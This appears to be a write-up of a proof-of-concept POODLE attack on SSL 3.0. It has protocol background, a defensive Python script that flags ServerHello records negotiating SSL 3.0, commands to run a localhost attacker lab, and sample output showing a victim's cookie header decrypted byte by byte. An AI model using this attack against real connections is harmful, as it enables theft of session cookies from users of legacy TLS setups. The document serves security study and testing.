Introduction:
SSL 3.0 [RFC6101] is an obsolete and insecure protocol. While for most practical purposes it has been replaced by its successors TLS 1.0 [RFC2246], TLS 1.1 [RFC4346], and TLS 1.2 [RFC5246], many TLS implementations remain backwards-compatible with SSL 3.0 to interoperate with legacy systems in the interest of a smooth user experience. The protocol handshake provides for authenticated version negotiation, so normally the latest protocol version common to the client and the server will be used.
The POODLE attack requires an SSL 3.0 connection to be established, so disabling the SSL 3.0 protocol in the client or in the server (or both) will completely avoid it. If either side supports only SSL 3.0, then all hope is gone, and a serious update is required to avoid insecure encryption. If SSL 3.0 is neither disabled nor the only possible protocol version, then the attack is possible if the client uses a downgrade dance for interoperability.
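A check for the condition above, as an added example that is not part of the original PoC: it reads the server_version field of a captured ServerHello record and flags handshakes that settled on SSL 3.0. The function names and the sample records are constructed for illustration.

```python
import struct

SSL3 = (3, 0)
HANDSHAKE, SERVER_HELLO = 0x16, 0x02
# server_version(2) + random(32) + session_id_len(1) + cipher_suite(2) + compression(1)
MIN_HELLO_BODY = 38


def server_hello_version(record: bytes):
    """Return (major, minor) from a ServerHello record, or None if the
    bytes are not one complete handshake record holding a ServerHello."""
    if len(record) < 5:
        return None
    ctype, _maj, _min, rlen = struct.unpack("!BBBH", record[:5])
    body = record[5:]
    if ctype != HANDSHAKE or len(body) != rlen or rlen < 4 + MIN_HELLO_BODY:
        return None
    hlen = int.from_bytes(body[1:4], "big")
    if body[0] != SERVER_HELLO or hlen < MIN_HELLO_BODY or 4 + hlen > rlen:
        return None
    # The version the server selected, not the record-layer version.
    return (body[4], body[5])


def find_ssl3(records):
    """Indexes of the records whose ServerHello selected SSL 3.0."""
    return [i for i, r in enumerate(records) if server_hello_version(r) == SSL3]


def build_server_hello(major: int, minor: int) -> bytes:
    """Constructed sample record: zero random, empty session id,
    cipher suite 0x002f (an AES-CBC suite), null compression."""
    hello = bytes([major, minor]) + bytes(32) + b"\x00" + b"\x00\x2f" + b"\x00"
    handshake = bytes([SERVER_HELLO]) + len(hello).to_bytes(3, "big") + hello
    return bytes([HANDSHAKE, major, minor]) + len(handshake).to_bytes(2, "big") + handshake


if __name__ == "__main__":
    capture = [build_server_hello(3, 3), build_server_hello(3, 0)]
    for i in find_ssl3(capture):
        print(f"record {i}: server selected SSL 3.0")
```

Any record this flags means both endpoints still accept SSL 3.0, which is the precondition the paragraph above describes.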
Optimization Potential :
The PoC implementation of the attack is far from optimal. Every generated request requires an additional HTTP roundtrip to ask the HTTP server for the next request's parameters, even though the parameters change only after a plaintext byte has leaked in the decryption phase.
Latest Change 14/05/2015:
– Swapped debug/no debug command in poodle-dev.sh and added start-offset
– Added test certificates
– Working version
Test Environment :
– Start HTTP server with: ./poodle-dev.sh httpserver
– Start SSLv3 forwarder to HTTP server from point above with: ./poodle-dev.sh sslserver
– Start PoC with: ./poodle-dev.sh attacker
– Open HTTPS server in browser and accept certificate.
– Open PoC request generator and watch leaking bytes in PoC terminal
Example Output:
$ ./poodle.py --target-port 4433 --start-offset 384 https://localhost:8443
Starting SSL/TLS server on :8443 forwarding to localhost:4433
Starting HTTP server on :8000 generating requests to https://localhost:8443
Decrypted byte 384: C (0x43) in 8.1950 seconds with 57 requests
Victim now leaked 1 bytes: "C" 57 requests and 8.195 seconds per leaked bytes, 57 requests and 8.195 seconds total
Decrypted byte 385: o (0x6f) in 56.7356 seconds with 405 requests
Victim now leaked 2 bytes: "Co" 231 requests and 32.465 seconds per leaked bytes, 462 requests and 64.931 seconds total
Decrypted byte 386: o (0x6f) in 73.1930 seconds with 519 requests
Victim now leaked 3 bytes: "Coo" 327 requests and 46.041 seconds per leaked bytes, 981 requests and 138.124 seconds total
Decrypted byte 387: k (0x6b) in 36.4802 seconds with 259 requests
Victim now leaked 4 bytes: "Cook" 310 requests and 43.651 seconds per leaked bytes, 1240 requests and 174.604 seconds total
Decrypted byte 388: i (0x69) in 54.8990 seconds with 387 requests
Victim now leaked 5 bytes: "Cooki" 325 requests and 45.901 seconds per leaked bytes, 1627 requests and 229.503 seconds total
Decrypted byte 389: e (0x65) in 14.2407 seconds with 99 requests
Victim now leaked 6 bytes: "Cookie" 287 requests and 40.624 seconds per leaked bytes, 1726 requests and 243.744 seconds total
Decrypted byte 390: : (0x3a) in 34.2510 seconds with 240 requests
Victim now leaked 7 bytes: "Cookie:" 280 requests and 39.714 seconds per leaked bytes, 1966 requests and 277.995 seconds total
Source : https://github.com/thomaspatzke | http://patzke.org/implementing-the-poodle-attack.html